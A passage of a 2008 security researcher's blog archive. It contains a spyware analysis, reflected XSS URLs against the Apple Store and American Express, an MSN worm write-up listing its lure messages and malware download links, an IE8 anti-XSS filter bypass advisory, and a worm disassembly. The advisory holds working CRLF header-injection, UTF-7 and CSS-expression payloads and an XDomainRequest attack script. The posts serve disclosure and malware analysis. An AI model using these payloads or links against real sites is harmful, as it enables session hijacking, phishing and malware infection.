HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ except for (AutoDetect and UNCAsIntranet which exist there and get modified):<br />ProxyBypass:1 (default 1)<br />IntranetName:1 (default 1)<br />MigrateProxy:1 (default 1)<br />AutoDetect:1 (default 0)<br />UNCAsIntranet:1 (default 0)<br />ProxyEnable:0 (default 0)<br /><br />It sure looks like someone is going to assign a proxy for us :)<br /><br />The setup process command-line:<br />"C:\Documents and Settings\Insider\Local Settings\Temporary Internet Files\{5617ECA9-488D-4BA2-8562-9710B9AB78D2}\stbup.exe" /new /src=user<br /><br />the "/src=user" really sounds like there are cases which the user did not initiated the installation :) it could be used for self-update though.<br /><br />Lets examine some of the the strings in the memory of this "DoubleD" software:<br />Software\SimonTatham\PuTTY\Sessions<br />Software\SimonTatham\PuTTY\SshHostKeys<br />Software\SimonTatham\PuTTY<br />\PUTTY.RND<br />Well, i don't want to point a blaming finger but it seems this "legitimate smiley IE toolbar" is very interested in getting some access to our saved PuTTY SSH hosts...quite innocent<br /><br />There are a lot of weird stuff this spyware does, like starting a local proxy which explains how they steal data from IE and makes this self-updating software a cool way to make a non-botnet botnet :)<br />It also implements an SSH client and almost every famous encryption algorithm (rinjdeal, AES, des, 3des, blowfish) looks like it does local MITM attacks to SSH login software.<br /><br />So get root and Smile away with it :)Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com3tag:blogger.com,1999:blog-9114770521689436630.post-61780792945339002182008-12-24T18:54:00.001-08:002008-12-24T18:54:59.868-08:00Big Brands XSS<span class="postbody"><br />Apple Store - XSS (less then 15 minutes to find it, manually)<br /><textarea rows=8 cols=48>http://store.apple.com/us/product/TU243LL/A?fnode=MTY1NDA4Mg&mco=MjQyMDQ1OA&s=newest'"><script>alert("The apple didn't fell far from the last apple")</script>%3E%3Cdiv%20id=%22</textarea><br /><br />American Express - HTTPS XSS (less then a minute to find it, manually)<br /><textarea rows=8 cols=48>https://www01.extra.americanexpress.com/ProductImage.aspx?url=https://merpic.intelliwebservices.com/img/full/10185/b2/50fe31e266936b2887ab3ef9608f2db2.gif%22%3E%3Cscript%3Ealert(%27American%20XSSspress%27)%3C/script%3E%3Cdiv%20id=%22</textarea><br /><br /></span><br /><span class="postbody"></span>How can us customers trust the big brand companies when our accounts are compromised and we can no longer trust links to those empires websites?!</span>Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com1tag:blogger.com,1999:blog-9114770521689436630.post-81130559541278143102008-12-18T19:37:00.001-08:002009-01-13T03:06:40.852-08:00The MSN "Not A Phishing Worm"This is a funny one actually :)<br />I am just working as usual when I got the following message on my MSN Messenger:<br /><blockquote>This is how real girls party. Great high quality pictures on<br />http://jusmineza.PartyPicturez.info</blockquote>Now of course i understood that it's a worm, but still, lets see where it leads to.<br />So I went into the site and it looked like this:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_18YBLFP2tdA/SUsYOiHeOBI/AAAAAAAAAEU/qcNjsVZd9ho/s1600-h/msnphishing.bmp"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 300px;" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SUsYOiHeOBI/AAAAAAAAAEU/qcNjsVZd9ho/s400/msnphishing.bmp" alt="" id="BLOGGER_PHOTO_ID_5281341625977419794" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />With what i have seen until now, this is a classic phising site, I saw dozens<br />like it for Yahoo! in the past. But wait! lets look at that GREY text blow:<br /><p><a name="terms"></a></p><blockquote><p><a name="terms">Terms of Use / Privacy Policy:</a></p> <a name="terms"> </a><p><a name="terms">By filling out this form, you authorize T P Ltd to spread the word about this new 100% real and upcoming Messenger Community Site. You will receive your share of the credit in helping us spread the word. This is a harmless Community site which is offering users a platform to meet each other for free.</a></p> <a name="terms"> </a><p><a name="terms">We do not share your private information with any third parties. By using our service/website you hereby fully authorize T P Ltd to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us. This is not a "phishing" site that attempts to "trick" you into revealing personal information. Everything we do with your information is disclosed here. If you are under eighteen (18), you MUST obtain permission from a parent or guardian before using our website/service.</a></p> <a name="terms"> </a><p><a name="terms">This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).</a></p> <a name="terms"> </a><p><a name="terms">ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED OR ALLEGEDLY CAUSED BY ANY FAILURE OF PERFORMANCE, ERROR, OMISSION, INTERRUPTION, DEFECT, DELAY IN OPERATION OR TRANSMISSION, COMMUNICATIONS LINE FAILURE, SHALL BE STRICTLY LIMITED TO THE AMOUNT PAID BY OR ON BEHALF OF THE SUBSCRIBER TO THIS SERVICE.</a></p> <a name="terms"> </a><p><a name="terms">We may temporarily access your MSN account to do a combination of the following: 1. Send Instant Messages to your friends promoting this site. 2. Introduce new entertaining sites to your friends via Instant Messages.</a></p> <a name="terms"> </a><p><a name="terms">This is a free service. You will not be asked to pay at any time. You will not be subscribed to anything asking for payment. This service is made possible by many hours of human effort. </a></p> <a name="terms"> </a><p><a name="terms">T P Ltd reserves the right to change the terms of use / privacy policy at any time without notice. To view the latest version of this privacy policy, simply bookmark this page for future reference. </a></p> <a name="terms"> </a><p><a name="terms">You understand that this agreement shall prevail if there is any conflict between this agreement and the terms of use you accepted when you signed up with MSN. You also understand that by temporarily accessing your msn account, T P Ltd is NOT agreeing to MSN's terms of use and therefore not bound by them.</a></p> <a name="terms"> </a><p><a name="terms">This agreement shall be construed and governed by the law of the republic of Panama. You expressly consent to the exclusive venue and personal jurisdiction of the courts located in the Republic of panama for any actions arising from or relating to this agreement.</a></p> <a name="terms"> </a><p><a name="terms">If any provision of this agreement is held to be invalid, illegal or unenforceable for any reason, such invalidity, illegality or unenforceability shall not effect any other provisions of this agreement, and this agreement shall be construed as if such invalid, illegal or unenforceable provision had not been contained herein.</a></p> <div id="copyr"> <a name="terms"> </a><center><a name="terms">Copyright 2008 T P Ltd</a></center></div></blockquote><div id="copyr"><center><a name="terms"></a></center> </div><a name="terms">OK, they said in the text:<br /></a><blockquote><a name="terms">This is not a "phishing" site that attempts to "trick" you into revealing personal information.</a></blockquote>So they don't want our usernames and password, which is also the EMAIL of most people, yeah I believe them, sure.<br /><br />They just want to:<br /><blockquote><a name="terms">1. Send Instant Messages to your friends promoting this site. 2. Introduce new entertaining sites to your friends via Instant Messages.</a><br /></blockquote>Which is completely different with what a worm does. A worm just spreads and "introduces", "entertaining" sites with a lot of porn and exploits.<br /><a name="terms"></a><blockquote><a name="terms">By using our service/website you hereby fully authorize T P Ltd to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us.</a><br />.....<br /><a name="terms">ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED</a></blockquote>Yeah why not, take my account and send spam "<a name="terms">on behalf of third parties</a>" and if they get like hacked or something, we are not responsible, you agreed to this.<br /><br />I believe this should be called "Legal Phishing User Agreement" or "Worm As A Service".<br />It is also a little wiered that a "legal" domain called "partypicturez.info" is dealing with MSN accounts and not PICTURES FROM PARTIES and has unlimited(*.) subdomains and only 1 page, don't you think?!<br />Ofcourse they used the domain protection:<br /><blockquote>Registrant Email:9648af2d68114548bfc703cca6806a46.protect@whoisguard.com<br />Admin Name:WhoisGuard Protected<br />Admin Organization:WhoisGuard</blockquote>Well, don't fill any form you see without reading the small (and in this case GREY) prints :)<br /><p>Update:<br />The messages are updated by the hour, these ones are specific for xmas.<br />Any file or subdomain in win-win-it.com redirects to http://www.desktopsmiley.com/go.do?a=814<br />The same worm also sends this message:</p> <blockquote><p>"[msn_dst_user], claim your Prize!<br />http://[msn_src_user]<geckopastefix></geckopastefix>.win-win-it.com/winner.php"</p></blockquote> <p>And</p><p></p><blockquote>congratulations [msn_dst_user]!!!<br />http://[msn_src_user]<geckopastefix></geckopastefix>.accept-your-gift.com/winner.php<br /></blockquote><p></p><p>And</p><p></p><blockquote>merry XMAS heres your gift<br />http://[msn_src_user]<geckopastefix></geckopastefix>.specialofferforyou.info/gift.php<br /></blockquote><p></p><p>And</p><p></p><blockquote><p>[msn_dst_user], claim your Xmas Card!<br />http://[msn_src_user]<geckopastefix></geckopastefix>.greeting-cardss.com/xmas.php</p><p></p></blockquote><p>And</p><p></p><blockquote>http://freegiftznow.com/xmas.php</blockquote>And<br /><blockquote>[msn_dst_user], see the pics from yesterday's christmas party what do u think?<br />http://[msn_src_user]<geckopastefix></geckopastefix>.yourimagez.com/xmas.php<br /></blockquote>And this one, which redirects to http://www.xxxblackbook.com<br /><blockquote>Mmmm Babe!<br /><br />Just got myself a naughty profile here. You should check me out before its too late!<br /><br />http://www.theblogboards.com/profiles.php</blockquote>And this one which is misconfigured and will not work the the subdomain contains an "_"<geckopastefix></geckopastefix><blockquote>http://[msn_src_user]<geckopastefix></geckopastefix>.crazy-new-year-party-pics.com </blockquote>And<br /><blockquote>http://nu-years.awesomeofferz.com</blockquote>And<br /><blockquote>http://[msn_src_user]<geckopastefix></geckopastefix>.real-cool-newyear-party-pics.com<br /></blockquote>And<br /><blockquote>Claim your Prize! EXPIRY: TODAY!!!! Hurry<br />http://mypoemstoyou.com/winner.php</blockquote>And<br /><blockquote>see pictures of me naked &amp; fucking all night long!! LOL<br />http://www.seex4u.com/collegepics.php</blockquote>And<br /><blockquote>see my 2009 new years party album i uploaded here <:o)<:o) http://2009-newyear-party-pics.com/party.php</blockquote>And this which redirects to http://www.naughty-nightz.com/<br /><blockquote>see this blog<br />http://theblogboards.com/blog.php<br /></blockquote>And<br /><blockquote>hey babe... i created a profile here with some of my secret pictures.... dont wait too long .... signup to see!<br />http://www.date-me-now.com/myprofile.php</blockquote><blockquote><blockquote></blockquote></blockquote><blockquote></blockquote><blockquote></blockquote><p></p> <p>Which is also registered by WHOISGuard.<br />Both these websites were built to make people download this:<br />http://www.desktopsmiley.com/toolbar/desktopsmiley/download/stb_installer.exe</p> <p>Which they claim is:</p> <blockquote><p>"Download DesktopSmiley to get 1000's of <b>FREE</b> Smileys!<br />It's totally <b>FREE</b>! No Registration. No Spyware."</p></blockquote> <p>Yes, a toolbar advertised by a WORM is not spyware, sure...<br />The example above was version 2.0c. It seems these guys used different methods and different domains and different company names in the older versions (which is typical to viruses and spyware but not to legitimate software).<br />The following example belongs to an older version 1.1c whi MSN message:</p><p></p><blockquote>foto http://hi5.eu.com/id.php?=[dst_user_email]</blockquote>Which prompts a download for "IMG455.jpg-www.photo.com" which is an EXE file with a COM extension and where ran "True Type Detection" will be made by windows loader and it will execute as the regular EXE file it is.<br />Those people don't care a bit and they left "Directory Browsing" open in the subdomain's root, check it out at: http://hi5.eu.com/<br />They even forgot to remove their private packer from the site: http://hi5.eu.com/pa-packer.rar<br /><br />They also have a version at: http://new.upicx.com/ (which i think just went down...)<br />Which loads " http://new.upicx.com/indexx.php" and " http://new.upicx.com/pop.php" and VERIFYS the request's REFERER is " http://new.upicx.com/" so direct reference to these files returns "404 Not Found".Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com6tag:blogger.com,1999:blog-9114770521689436630.post-80202508160138916972008-11-24T02:39:00.000-08:002008-12-24T12:47:31.780-08:00Internet Explorer 8.0 Beta 2 Anti-XSS FilterAspect9: Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities<br /><br />Release Date:<br />November 24, 2008<br /><br />Date Reported:<br />October 5, 2008<br /><br />Severity:<br />Medium-High (Execute scripts, Turning Protection Off, Transfer data Cross<br />Domains)<br /><br />Vendor:<br />Microsoft<br /><br />Systems Affected:<br />Windows Platform with Internet Explorer 8.0 Beta 2<br /><br /><br />Overview:<br />Aspect9 has discovered several vulnerabilities in Microsoft Windows<br />Internet Explorer 8.0 Beta 2. This new version of Microsoft's famous<br />browser includes new security improvements such as a Cross Site Scripting<br />(XSS) filter. This version also includes a new object that safely allows<br />transferring data across domains, allowing them to interact with each other.<br /><br />The Anti-XSS filter has been found to have some security holes in the<br />current implementation. Microsoft decided to filter "Type 1 XSS" which is<br />free text send to the server being reflected to the user and therefore<br />injecting HTML code into the website's page. They chose not to handle<br />certain situations such as injection into a JavaScript tag space, which<br />would be extremely difficult to filter. The software giant also chose not<br />to filter injection into HTTP headers, which will drive hackers to focus on<br />discovering CRLF vulnerabilities.<br /><br />A quote of Microsoft's Anti-XSS filter design philosophy:<br />[[[<br />"Like all security mitigation and protection technologies, the XSS Filter’s<br />approach does have limitations, being that it is a pragmatic balance<br />between application compatibility, security, and performance.<br /><br />Some examples:<br />* Injection into some contexts is not blocked. Ex: Scenarios where content<br />can be injected directly into JavaScript without breaking out of a string.<br /><br />* Injections facilitated by some HTTP headers are not currently blocked.<br />Ex: “Referer” based injection.<br /><br />* If a page contains multiple nearby injection points, attacks can be<br />constructed that thwart the XSS Filter."<br />]]]<br /><br />For more information about the Anti-XSS filter:<br />http://blogs.msdn.com/dross/archive/2008/07/03/ie8-xss-filter-design-<br />philosophy-in-depth.aspx<br /><br />In order to understand the contents of this advisory, the reader must be<br />familiar with the concept of CRLF which is distinguished from CRSF.<br />http://www.owasp.org/index.php/CRLF_Injection<br />http://www.owasp.org/index.php/CSRF<br /><br /><br /><br />Technical Details:<br /><br />Bypass using CRLF+Encodings:<br />---------------------------------------------<br />Microsoft Windows Internet Explorer 8.0 Beta 2 was designed to stop "Type 1<br />XSS" attacks. CRLF Injection is also XSS type 1 and is not mitigated by the<br />filter, though the data in the query string will still be filtered.<br />This means that if an attacker tries to exploit a CRLF for XSS in the<br />casual manner, used in this demo:<br />http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A[html][body]<br />[script]alert('get it?')[/script][/body][/html]<br /><br />His attack will fail as "[script]" will be filtered to "[sc#ipt]"<br /><br />However, an attacker can inject a content-type header and overwrite the<br />page charset and therefore bypass the XSS filter which uses the prior<br />encoding. A good example for this is with utf-7, the following request:<br />http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0d%0aContent-<br />Type: text/html; charset%3dutf-7%0d%0a%0d%0a[html][body]+ADw-script+AD4-<br />alert('owned')+ADw-/script+AD4-[/body][/html]<br /><br />This will result in:<br /><br />HTTP/1.1 200 OK<br />Content-Type: text/html; charset=utf-7<br />Server: Microsoft-IIS/6.0<br />Set-Cookie: url=cooki1=value1;<br />X-Powered-By: PleskWin<br />MicrosoftOfficeWebServer: 5.0_Pub<br />X-Powered-By: ASP.NET<br />Date: Sun, 05 Oct 2008 23:46:11 GMT<br />Connection: close<br /><br />[html][body]+ADw-script+AD4-alert('owned')+ADw-/script+AD4-[/body][/html];<br />Content-Type: text/html<br /><br />This will be rendered as utf-7 and will execute.<br /><br /><br /><br />Bypass using CRLF+"X-XSS-Protection":<br />-------------------------------------------------------<br />In addition to the problem of CRLF being able to re-write the page and<br />bypass the filter using a different encoding than the one of the page,<br />Microsoft were kind enough to leave a backdoor AKA feature for developers<br />to turn the filter off. This header is called "X-XSS-Protection" which gets<br />a Boolean value of 0 or 1. Injecting "X-XSS-Protection: 0" though CRLF an<br />attacker can shutdown the XSS protection for the current request.<br /><br />Demo:<br />http://www.linkstofiles.com/crlf.py?url=cooki1%3dvalue1;%0d%0aX-XSS-Protection: 0<br />%0d%0a%0d%0a[html][body][script]alert('owned')[/script][/body][/html]<br /><br />Of course the problem goes further to any HTTP header that can be used<br />maliciously like setting cookies and by that changing to a different user<br />then the one logged on, such as stealing their cookie and then replacing it<br />with a cookie of a bulk user and therefore taking over their session. using<br />"Location:" header to redirect pages and internal frames/iframes to<br />look-a-like phishing websites and etc...<br /><br />Demos:<br />http://www.linkstofiles.com/crlf.py?url=cooki1%3dvalue1;%0d%<br />0aLocation:http://www.micros0ft.com%0d%0a%0d%0a<br /><br />http://www.linkstofiles.com/crlf.py?url=cooki1%3dvalue1;%0d%0aSet-<br />Cookie:sessionid%3dblablablabla_bulk_user_md5_sessionid%0d%0a%0d%<br />0a[html][body]The server is busy, try again in 30 minutes[/body][/html]<br /><br /><br /><br />CRLF+"XDomainRequestAllowed" --] XDomainRequest Enabling:<br />---------------------------------------------------------<br />Having a CRLF injection already gives an attacker the ability to overwrite<br />the HTTP response BODY, which means he can create a new hidden<br />image/frame/form and send data through it, data such as the domains cookie.<br />But it is clear that overwriting the body using CRLF and making it look the<br />same requires a "fetcher" server side script on the same domain. Also a<br />network filter or a WAF may deny injection of double CRLF (%0d%0a%0d%0a).<br />As time goes by and security evolves, the attacker should have a harder<br />time sending this information out silently.<br /><br />In IE8, there is a new object called "XDomainRequest" which is designed to<br />allow safe data exchange across domains.<br />More information at:<br />http://msdn.microsoft.com/en-us/library/cc288108(VS.85).aspx<br /><br />The browser will only allow the client(the JavaScript code) to interact<br />with that website if the website returns the "XDomainRequestAllowed"<br />Boolean header.<br /><br />Using CRLF to inject XDomainRequestAllowed header an attacker can interact<br />in a CROSS DOMAIN mode with that website without his consent, as it is<br />being faked by the injected header. This attack concept on the XDomainRequest<br />in general should be named "XAI" (XDR Allowed Injection)<br /><br />This is a demo request to a CRLF vulnerable web page:<br />http://www.linkstofiles.com/crlf.py?url=cooki1%3dvalue1;%0d%<br />0aXDomainRequestAllowed: 1<br /><br />This is how the attacker's script would look like:<br />------------------------------------------------<br />[script]<br />try {<br /> xdr = new XDomainRequest();<br /> xdr.onload = function() {<br /> alert(xdr.responseText);<br /> }<br /> xdr.open("GET", "http://www.linkstofiles.com/crlf.py?url=cooki1%<br /> 3dvalue1;%0d%0<br /> aXDomainRequestAllowed: 1");<br /> xdr.send("");<br />} catch (e) {<br /> alert(e.description)<br />}<br />[/script]<br />------------------------------------------------<br />The attacker can now transfer data to/from that domain other domains with just 1<br />header injection, a new, by design weapon to replace leak data with XSS.<br />An attacker can use the new feature to interact with web servers (i.e. send and<br />receive data from those domains) by pretending to have the authorization to do so,<br />using a single CRLF header injection.<br />This is an ultimate vulnerability that exploits this new feature to enable easy<br />information data leakage and cross domain attacks.<br /><br /><br /><br />UTF-7 Websites are not filtered:<br />-------------------------------------------<br />When the page charset is set to utf-7 whether by the http header or by a<br />meta tag, the Anti-XSS filter will not apply on this page, allowing a utf-7<br />encoded injected html code to execute. In other words, utf-7 content sent<br />to utf-7 encoded web pages is not filtered, therefore allowing XSS attacks<br />on utf-7 web pages.<br /><br />I must admit that I have never met a website written in utf-7 for non-malicious<br />purposes, but it is still a feature and there are many website that<br />implement language templates and receive the charset as a parameter from<br />the query string or the cookie.<br /><br />Demos:<br />http://www.linkstofiles.com/xssurlnoparams.py/+AD4-+ADw-script+AD4-alert<br />('see?')+ADw-/script+AD4-+ADw-div<br /><br />http://www.linkstofiles.com/xssurlnoparams.py?data=+AD4-+ADw-script+AD4-<br />alert('see?')<br />+ADw-/script+AD4-+ADw-div<br /><br /><br />Direct bypass using any double injection:<br />-----------------------------------------<br />A quote from the filter's architecture implementation:<br />[[[<br />"If a page contains multiple nearby injection points, attacks can be<br />constructed that thwart the XSS Filter."<br />]]]<br />Well, that is not accurate.<br /><br />ANY second appearance of the injected data will allow execution of script<br />code. The concept is that data inside tags such as script and style is<br />parsed by their own parser.<br /><br />The CSS(style) parser has 2 characteristics that differentiate it from the<br />script parser:<br />1) It is a silent parser (there is no indication of failure)<br />2) It is executing as batch operations per block, which means that closing<br />A NON EXISTING (never opened) block will cause parsing of the following<br />blocks. What does this mean?!?!<br /><br />It means that in a quite common scenario of any text injected just twice at<br />any position inside the HTML(except inside a textarea/script/style tags,<br />these can also be fixed by putting [/textarea] in a css comment) of the<br />page will cause at the first point where the code is injected to the page<br /><br />} BODY{a:expression(alert('hi'))};[/style]***[style]***<br /><br />a style tag is opened and anything after it will be ignored by a silent css<br />parser error and on the second injection:<br /><br />***} BODY{a:expression(alert('hi'))};[/style]***[style]<br /><br />a new style block will be opened, rendered and this would automatically<br />execute script code!<br /><br />Demo:<br />http://www.linkstofiles.com/doublexss.py?username=} BODY{a:expression<br />(alert('hi'))};[/style][style]<br /><br /><br />Filter False Positives:<br />-----------------------<br />The following text send to a page as parameters will trigger a false-positive<br />match by the Anti-XSS filter:<br /><br />["script"]alert('innocent code')[/script]<br />['script']alert('innocent code')[/script]<br />"[[whatever]script]alert('innocent code')[/script]<br /><br />The following should trigger on most CSS design forums with a preview<br />feature:<br />[style]@import[/style]<br />[style]x:y(1)[/style]<br /><br />This means that a CSS tutorial web page cannot send to itself or to another<br />page the following raw text (whether it will be treated as text or as HTML<br />by the receiving page):<br /><br />[style]color:rgb(1,2,3)[/style]<br /><br /><br /><br />Vendor Status:<br />Microsoft's response regarding the CRLF issues:<br />“We will not be lead to compromise the XSS Filter’s web site compatibility<br />by attempting to address every conceivable XSS attack scenario.”<br /><br />Microsoft's response regarding the STYLE issue:<br />"We hope we can get a change in prior to IE8 RC1"<br /><br /><br />Credit:<br />Rafel Ivgi<br /><br /><br />Greetings:<br />David Ross, the_pull, Liu Die Yu, Arkon, JonD, lorgandon, xbxice, Budo, Reiter,<br />Inga, Lucid, h.p.c, Dror Shalev, wir3less, Zull, 0fir0, dbrod, ax1les,<br />whitehawkofjustice<br /><br /><br />Disclaimer<br />The information within this paper may change without notice.<br />Use of this information constitutes acceptance for use in an<br />AS IS condition. There are no warranties, implied or express,<br />with regard to this information. In no event shall the author<br />be liable for any direct or indirect damages whatsoever<br />arising out of or in connection with the use or spread of<br />this information. Any use of this information is at the<br />user's own risk.Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-82239734385043223482008-11-12T13:37:00.000-08:002008-11-12T17:14:01.001-08:00A new MSN WormAre viruses attracted to me specifically or it happens to everyone and they just don't notice or say nothing about it. It getting really hard to speak with people using instant messengers and to be sure it is them sending you a message and not a virus.<br /><br />Before i begin, let's notice a few close viruses :)<br />This: http://www.cisrt.org/enblog/read.php?106<br />Is a different one, older one from July. Reported and still not fully detected by vendors.<br /><br />Now for the painful part, this:<br />http://blog.threatfire.com/2008/06/msn-im-worm.html<br />a little older variant that was covered in June!!! that is 5 month ago!! the detection rates were nasty, they still are as you will see afterwards...<br />The point I don't get is why don't AV vendors take care of the missed detections at least AFTER some security researcher publishes an analysis?!<br /><br />I got a message from a friend who is currently having a trip in thailand and i was amazed to see that his computer sent me a message with a link with my msn email in it. I clicked the link and here a file download prompt pops up and the file name is: "virus-PIC006.JPG-www.myspace.exe".<br />Well, as tired as i may be, i would never be THAT tired to execute it :)<br /><br />So i saved it and started to analyze!<br />Well what is it? it is a self extracting cab archive(almost original :) with resource details spoofed to be a microsoft file! (it even looks like it was edited manually using a tool such as Resource Hacker)<br />File Version: "6.0.2900.2180"<br />Description: "Win32 Cabinet Self-Extractor " (may be they thought we won't notice the spaces :)<br />Company: "Microsoft Corporation"<br />File Version: "6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)"<br />Internal Name: "Wextract "<br />Language: "English (United States)"<br />Original File name: "WEXTRACT.EXE "<br />Product Name: "Microsoft® Windows® Operating System"<br />Product Version: "6.00.2900.2180"<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_18YBLFP2tdA/SRtS-CC2kzI/AAAAAAAAADM/gAVvXKOzxEY/s1600-h/description.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 289px; height: 400px;" src="http://4.bp.blogspot.com/_18YBLFP2tdA/SRtS-CC2kzI/AAAAAAAAADM/gAVvXKOzxEY/s400/description.JPG" alt="" id="BLOGGER_PHOTO_ID_5267895414794130226" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />Well again it seems that Winrar is more effective than an Anti-Virus, where it detects it as a self-extracting archive so i know it's no simple exe:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_18YBLFP2tdA/SRtTJRKtzrI/AAAAAAAAADU/J0FO4DHVuGo/s1600-h/sfx.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 290px; height: 400px;" src="http://4.bp.blogspot.com/_18YBLFP2tdA/SRtTJRKtzrI/AAAAAAAAADU/J0FO4DHVuGo/s400/sfx.JPG" alt="" id="BLOGGER_PHOTO_ID_5267895607832202930" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />The funniest think about this "trap file" is that it has double extension of .jpg...........exe that comes with the default icon of a jpeg file<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_18YBLFP2tdA/SRtYqK0ai3I/AAAAAAAAADk/vkeUM2H00_o/s1600-h/jpgicon.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 78px; height: 90px;" src="http://4.bp.blogspot.com/_18YBLFP2tdA/SRtYqK0ai3I/AAAAAAAAADk/vkeUM2H00_o/s400/jpgicon.JPG" alt="" id="BLOGGER_PHOTO_ID_5267901670621875058" border="0" /></a><br /><br /><br /><br /><br /><br />BUT when you switch to DETAILS view in the browser, then you see its 16x16 icon which is a setup icon:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_18YBLFP2tdA/SRtY5ucPIHI/AAAAAAAAADs/cNXTfJG4Alg/s1600-h/setupicon.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 15px;" src="http://3.bp.blogspot.com/_18YBLFP2tdA/SRtY5ucPIHI/AAAAAAAAADs/cNXTfJG4Alg/s400/setupicon.JPG" alt="" id="BLOGGER_PHOTO_ID_5267901937882177650" border="0" /></a><br /><br />Dear bad guys! use some of that money you steal to do some Q&amp;A for your bot droppers!<br />O.K let's see if our friends know it:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_18YBLFP2tdA/SRtVc5VVc1I/AAAAAAAAADc/rlfvZvy3OjU/s1600-h/avs1.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 244px; height: 400px;" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SRtVc5VVc1I/AAAAAAAAADc/rlfvZvy3OjU/s400/avs1.JPG" alt="" id="BLOGGER_PHOTO_ID_5267898144054932306" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />9 of 36...wow!<br />Could it be that Symantec, Mcafee, Kaspersky, F-Secure, Panda, Sophos all the great brands does not even suspect it?! and that Microsoft which is quite new in the AV business catches it?! I want to point out <span style="font-weight: bold;">Dr. Web</span> again for being<span style="font-weight: bold;"> a good detector</span>(comparing to the concept of an Anti-Something) as Kaspersky once were, before they went to enterprise and from tech to GUI (if i was kaspersky, i would by dr web...just a thought)<br /><br />So we extract the sfx and we get a file called test.exe with a jpg icon, this time it's not an archive, here comes the real shame, it is not even packed!!!<br />Let's see if our friends know it:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_18YBLFP2tdA/SRt26eiEuuI/AAAAAAAAAD0/zySBHZLN4kY/s1600-h/avs2.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 246px; height: 400px;" src="http://3.bp.blogspot.com/_18YBLFP2tdA/SRt26eiEuuI/AAAAAAAAAD0/zySBHZLN4kY/s400/avs2.JPG" alt="" id="BLOGGER_PHOTO_ID_5267934936140397282" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />it is just a simple VC++ executable that uses dynamic function calls with the simplest use of a rolling xor running on the string "somenigz', quite amusing :)<br /><br />.text:0040122E mov [ebp+var_340], 0<br />.text:00401238 push offset Source ; "¦âöÉàöíâPÆöéé¦"<br />.text:0040123D call sub_401000<br />.text:00401242 add esp, 4<br />.text:00401245 push eax ; lpProcName<br />.text:00401246 push offset aFgqfaXaa ; "Üöâƒö¥-+¯ò¥¥"<br />.text:0040124B call sub_401000<br />.text:00401250 add esp, 4<br />.text:00401253 push eax ; lpModuleName<br />.text:00401254 call ds:GetModuleHandleA<br />.text:0040125A push eax ; hModule<br />.text:0040125B call ds:GetProcAddress<br /><br />You can see these letters "Üöâƒö¥-+¯ò¥¥" which are clearly XORed sent to a function, the classic "decrypt my dll name and then the function in it and call it". Of course "sub_401000" is the decrypt function:<br /><br />.text:0040105D Rolling_Xor_Loop: ; CODE XREF: sub_401000+85 j<br />.text:0040105D mov edx, [ebp+var_C]<br />.text:00401060 add edx, 1<br />.text:00401063 mov [ebp+var_C], edx<br />.text:00401066<br />.text:00401066 loc_401066: ; CODE XREF: sub_401000+5B j<br />.text:00401066 cmp [ebp+var_C], 9<br />.text:0040106A jnb short loc_401087<br />.text:0040106C mov eax, [ebp+Str]<br />.text:0040106F add eax, [ebp+var_8]<br />.text:00401072 mov ecx, [ebp+var_C]<br />.text:00401075 mov dl, [eax]<br />.text:00401077 xor dl, byte ptr aSomenigz[ecx] ; "somenigz"<br />.text:0040107D mov eax, [ebp+Str]<br />.text:00401080 add eax, [ebp+var_8]<br />.text:00401083 mov [eax], dl<br />.text:00401085 jmp short Rolling_Xor_Loop<br /><br />Decoded XORed strings, by order, are:<br />CreateProcessA<br />kernel32.dll<br />NtUnmapViewOfSection<br />ntdll.dll<br 